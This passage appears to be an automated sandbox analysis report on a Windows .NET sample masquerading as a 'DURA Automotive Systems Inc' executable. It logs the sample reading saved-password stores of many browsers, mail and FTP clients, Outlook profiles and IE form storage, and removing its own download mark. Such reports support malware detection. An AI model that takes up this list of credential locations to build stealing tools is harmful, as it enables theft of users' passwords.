| private_0x0000000000400000 | 0x00400000 | 0x00433fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x004dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004e0000 | 0x004e0000 | 0x004effff | Private Memory | - |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x005effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000005f0000 | 0x005f0000 | 0x00777fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x0078ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sorttbls.nlp | 0x00790000 | 0x00794fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x007a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x007bffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x007c0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000007d0000 | 0x007d0000 | 0x0080ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x00990fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x01d9ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortkey.nlp | 0x01da0000 | 0x01de0fff | Memory Mapped File | Readable |
|
|
|
- |
| wbemdisp.tlb | 0x01df0000 | 0x01dfefff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000001e00000 | 0x01e00000 | 0x01e06fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001e10000 | 0x01e10000 | 0x01e4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001e50000 | 0x01e50000 | 0x01e51fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001e60000 | 0x01e60000 | 0x01e60fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001e70000 | 0x01e70000 | 0x01e7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| custommarshalers.dll | 0x01e80000 | 0x01e94fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001ea0000 | 0x01ea0000 | 0x01eaffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001eb0000 | 0x01eb0000 | 0x01eeffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001ef0000 | 0x01ef0000 | 0x01ef1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| stdole2.tlb | 0x01ef0000 | 0x01ef3fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000001f20000 | 0x01f20000 | 0x01f5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f60000 | 0x01f60000 | 0x01f9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001fc0000 | 0x01fc0000 | 0x020bffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x020c0000 | 0x0238efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002390000 | 0x02390000 | 0x0438ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000043c0000 | 0x043c0000 | 0x043fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004460000 | 0x04460000 | 0x0455ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004560000 | 0x04560000 | 0x046effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000004560000 | 0x04560000 | 0x0463efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000004640000 | 0x04640000 | 0x0467ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000046b0000 | 0x046b0000 | 0x046effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000046f0000 | 0x046f0000 | 0x0475ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004770000 | 0x04770000 | 0x0486ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000048a0000 | 0x048a0000 | 0x048dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004990000 | 0x04990000 | 0x04a8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| kernelbase.dll.mui | 0x04a90000 | 0x04b4ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000004b80000 | 0x04b80000 | 0x04c7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004c80000 | 0x04c80000 | 0x04d7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004d80000 | 0x04d80000 | 0x04f0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004d80000 | 0x04d80000 | 0x04e7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004ed0000 | 0x04ed0000 | 0x04f0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005000000 | 0x05000000 | 0x0503ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000050b0000 | 0x050b0000 | 0x051affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005230000 | 0x05230000 | 0x0532ffff | Private Memory | Readable, Writable |
|
|
|
- |
| custommarshalers.dll | 0x60350000 | 0x60364fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.management.ni.dll | 0x71c80000 | 0x71d83fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| custommarshalers.ni.dll | 0x71d90000 | 0x71dc9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fastprox.dll | 0x71dd0000 | 0x71e65fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.windows.forms.ni.dll | 0x71e70000 | 0x72a4dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.drawing.ni.dll | 0x72a50000 | 0x72bd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorlib.ni.dll | 0x72be0000 | 0x736d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoreei.dll | 0x736f0000 | 0x73769fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.visualbasic.ni.dll | 0x73770000 | 0x7390afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoree.dll | 0x73910000 | 0x73959fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x73960000 | 0x73967fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x73970000 | 0x739cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x739d0000 | 0x73a0efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sxs.dll | 0x73b20000 | 0x73b7efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdsapi.dll | 0x73b80000 | 0x73b97fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wbemsvc.dll | 0x73ba0000 | 0x73baefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wmiutils.dll | 0x73bb0000 | 0x73bc6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wbemcomn.dll | 0x73bd0000 | 0x73c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wbemdisp.dll | 0x73c30000 | 0x73c60fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x73c70000 | 0x73caafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.ni.dll | 0x73cb0000 | 0x7444bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorjit.dll | 0x74450000 | 0x744aafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x745f0000 | 0x7466ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcr80.dll | 0x74670000 | 0x7470afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wbemprox.dll | 0x74710000 | 0x74719fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrtremote.dll | 0x74720000 | 0x7472dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorwks.dll | 0x74740000 | 0x74ceafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x74cf0000 | 0x74d05fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x74d20000 | 0x74d2afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcrypt.dll | 0x74d30000 | 0x74d46fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74d80000 | 0x74d8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74d90000 | 0x74deffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74ebbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74ec0000 | 0x74faffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x75180000 | 0x752dbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x752e0000 | 0x75314fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x755e0000 | 0x7568bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x75690000 | 0x7572ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75730000 | 0x7578ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x75790000 | 0x7582cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x75830000 | 0x75839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x758d0000 | 0x7595ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75960000 | 0x75a6ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x75b00000 | 0x76749fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76750000 | 0x767defff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x767f0000 | 0x76808fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x76810000 | 0x76892fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x768a0000 | 0x768e5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76ad0000 | 0x76bcffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76bd0000 | 0x76c26fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076e30000 | 0x76e30000 | 0x76f29fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076f30000 | 0x76f30000 | 0x7704efff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77050000 | 0x771f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x77200000 | 0x77205fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77230000 | 0x773affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007ef40000 | 0x7ef40000 | 0x7ef4ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007ef50000 | 0x7ef50000 | 0x7ef9ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
|
For performance reasons, the remaining 103 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
COM (20)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | WBEMLocator | IWbemLocator | cls_context = CLSCTX_INPROC_SERVER |
|
2 | |
| Create | WbemDefaultPathParser | IWbemPath | cls_context = CLSCTX_INPROC_SERVER |
|
3 | |
| Create | WbemDefaultPathParser | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
5 | |
| Create | WBEMLocator | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Create | 3C374A40-BAE4-11CF-BF7D-00AA006946EE | 00000001-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Create | WScript.Shell | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
6 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = \\.\root\cimv2 |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = \\.\root\cimv2 |
|
1 |
File (69)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Login Data | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\AppData\Roaming\Flock\Browser\profiles.ini | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\AppData\Roaming\Flock\Browser\signons3.txt | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\AppData\Roaming\Thunderbird\profiles.ini | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\AppData\Roaming\Postbox\profiles.ini | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\AppData\Roaming\FileZilla\recentservers.xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\kFT6uTQW\AppData\Roaming\CoreFTP\sites.idx | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Add Search Path | C:\Program Files (x86)\Mozilla Firefox\\ | - |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\DURA Automotive Systems Inc\DURA Automotive Systems Inc.exe.config | type = file_attributes |
|
3 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\DURA Automotive Systems Inc\DURA Automotive Systems Inc.exe | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Login Data | type = file_attributes |
|
4 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Login Data | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Login Data | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\logins.json | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Opera Software\Opera Stable\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Common Files\Apple\Apple Application Support\plutil.exe | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\SeaMonkey\logins.json | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Comodo\Dragon\User Data\Default\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Mozilla Firefox\nss3.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Postbox\nss3.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Mozilla Thunderbird\nss3.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\SeaMonkey\nss3.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Flock\nss3.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Mozilla Firefox\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Chromium\User Data\Default\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Torch\User Data\Default\Login Data | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Thunderbird\signons.sqlite | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Thunderbird\logins.json | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Opera Mail\Opera Mail\wand.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Pocomail\accounts.ini | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\The Bat! | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Postbox\signons.sqlite | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Ipswitch\WS_FTP\Sites\ws_ftp.ini | type = file_attributes |
|
1 | |
| Get Info | C:\ProgramData\DynDNS\Updater\config.dyndns | type = file_attributes |
|
1 | |
| Get Info | C:\Users\All Users\AppData\Roaming\FlashFXP\3quick.dat | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\.purple\accounts.xml | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\Ftplist.txt | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\jDownloader\config\database.script | type = file_attributes |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | size = 4096, size_out = 1459 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Login Data | size = 18432, size_out = 18432 |
|
1 | |
| Read | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini | size = 4096, size_out = 111 |
|
1 | |
| Read | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\profiles.ini | size = 4096, size_out = 0 |
|
1 | |
| Delete | C:\Users\kFT6uTQW\AppData\Roaming\DURA Automotive Systems Inc\DURA Automotive Systems Inc.exe:Zone.Identifier | - |
|
1 |
Registry (214)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 | - |
|
145 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Paltalk | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Vitalwerks\DUC | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\DownloadManager\Passwords | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting | value_name = Default Impersonation Level, data = 3 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting | value_name = Default Namespace |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting | value_name = Default Namespace, data = 114 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = Counter Names, type = REG_BINARY |
|
2 | |
